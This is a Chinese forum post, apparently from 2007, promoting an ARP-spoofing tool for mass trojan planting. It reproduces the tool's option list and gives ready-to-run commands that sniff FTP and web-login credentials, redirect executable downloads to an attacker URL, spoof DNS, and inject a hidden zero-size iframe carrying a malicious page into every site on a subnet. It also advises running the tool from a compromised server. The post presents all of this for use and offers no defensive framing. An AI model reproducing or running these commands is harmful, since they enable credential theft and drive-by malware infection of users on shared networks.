服务器维护,服务器代维,安全设置,漏洞扫描,入侵检测服务

运维之家

 找回密码
 注册
搜索
查看: 5261|回复: 1

arp欺骗批量挂马

[复制链接]
dirtysea 发表于 2007-3-2 22:33:09 | 显示全部楼层 |阅读模式

说明:需要winPcap 基于arp欺骗,
具体功能看下面的使用说明
基于ARP欺骗的东东,可网页插马,DNS欺骗,自定义关键字嗅探等


0. Realtek RTL8139

 IP Address. . . . . : 192.168.1.101

 Physical Address. . : 00-11-D8-6B-5E-19

 Default Gateway . . : 192.168.1.1

1. WAN (PPP/SLIP) Interface

 IP Address. . . . . : xx.xx.xx.xx

 Physical Address. . : 00-52-00-00-00-00

 Default Gateway . . : xx.xx.xx.xx

options:

 -idx [index] 网卡索引号

 -ip [ip] 欺骗的IP,用'-'指定范围,','隔开

 -sethost [ip] 默认是网关,可以指定别的IP

 -port [port] 关注的端口,用'-'指定范围,','隔开,没指定默认关注所有端口

 -reset 恢复目标机的ARP表

 -hostname 探测主机时获取主机名信息

 -logfilter [string]设置保存数据的条件,必须+-_做前缀,后跟关键字,

 ','隔开关键字,多个条件'|'隔开

 所有带+前缀的关键字都出现的包则写入文件

 带-前缀的关键字出现的包不写入文件

 带_前缀的关键字一个符合则写入文件(如有+-条件也要符合)

 -save_a [filename] 将捕捉到的数据写入文件 ACSII模式

 -save_h [filename] HEX模式

 -hacksite [ip] 指定要插入代码的站点域名或IP,

 多个可用','隔开,没指定则影响所有站点

 -insert [html code]指定要插入html代码

 -postfix [string] 关注的后缀名,只关注HTTP/1.1 302

 -hackURL [url] 发现关注的后缀名后修改URL到新的URL

 -filename [name] 新URL上有效的资源文件名

 -hackdns [string] DNS欺骗,只修改UDP的报文,多个可用','隔开

 格式: 域名|IP,www.aa.com|222.22.2.2,www.bb.com|1.1.1.1

 -Interval [ms] 定时欺骗的时间间隔,默认是3秒

 -spoofmode [1|2|3] 将数据骗发到本机,欺骗对象:1为网关,2为目标机,3为两者

 -speed [kb] 限制指定的IP或IP段的网络总带宽,单位:KB

example:

 嗅探指定的IP段中端口80的数据,并以HEX模式写入文件

 arp.exe -idx 0 -ip 192.168.0.2-192.168.0.50 -port 80 -save_h sniff.log

 FTP嗅探,在21或2121端口中出现USER或PASS的数据包记录到文件

 arp.exe -idx 0 -ip 192.168.0.2 -port 21,2121 -spoofmode 2 -logfilter "_USER ,_PASS" -save_a sniff.log

 HTTP web邮箱登陆或一些论坛登陆的嗅探,根据情况自行改关键字

 arp.exe -idx 0 -ip 192.168.0.2-192.168.0.50 -port 80 -logfilter "+POST ,+user,+pass" -save_a sniff.log

 用|添加嗅探条件,这样FTP和HTTP的一些敏感关键字可以一起嗅探

 arp.exe -idx 0 -ip 192.168.0.2 -port 80,21 -logfilter "+POST ,+user,+pass|_USER ,_PASS" -save_a sniff.log

 如果嗅探到目标下载文件后缀是exe等则更改Location:为http://xx.net/test.exe

 arp.exe -idx 0 -ip 192.168.0.2-192.168.0.12,192.168.0.20-192.168.0.30 -spoofmode 3 -postfix ".exe,.rar,.zip" -hackurl http://xx.net/ -filename test.exe

 指定的IP段中的用户访问到-hacksite中的网址则只显示just for fun

 arp.exe -idx 0 -ip 192.168.0.2-192.168.0.99 -port 80 -hacksite 222.2.2.2,www.a.com,www.b.com -insert "just for fun



arp欺骗批量挂马 

      arp.exe  (ARP欺骗tool)

      3389 肉鸡一台最好是服务器 或者内网机器

命令: arp.exe -idx 0 -ip 192.168.0.2-192.168.0.99 -port 80 -insert "<iframe src='xx' width=0 height=0>" 

这里网马地址就假设为  http://www.baidu.com/  那么命令就是

arp.exe -idx 0 -ip 192.168.0.2-192.168.0.99 -port 80 -insert "<iframe src='http://www.baidu.com/' width=0 height=0>"

接着上 3389 服务器 服务器必须安装 winPcap.exe 工具都有打包

然后就执行  arp.exe -idx 0 -ip 192.168.0.2-192.168.0.99 -port 80 -insert "<iframe src='http://www.baidu.com/' width=0 height=0>"   IP自己改

看看效果 !!!!!  绝对好用 自己试就知道了  这样挂马可是同网段好几个服务器的站基本都挂上你的马了 

只要别人访问这IP段中的某一个服务器上的站那么就自动欺骗插入我们的网马代码 

想更多利用这个工具自己baidu搜索吧 我就不帖了 贴多了不好看主要说挂马这突破性的功能就足够了  ftp 21  80 等 嗅探等自己看吧 要都说完估计没那时间太多功能
gsd 发表于 2006-5-20 14:05:11 | 显示全部楼层

re:arp欺骗批量挂马

大家不要进主业    被挂马了 

您需要登录后才可以回帖 登录 | 注册

本版积分规则

QQ|小黑屋|手机版|Archiver|运维之家

GMT+8, 2024-4-20 06:10 , Processed in 0.276697 second(s), 14 queries .

Powered by Dirtysea

© 2008-2020 Dirtysea.com.

快速回复 返回顶部 返回列表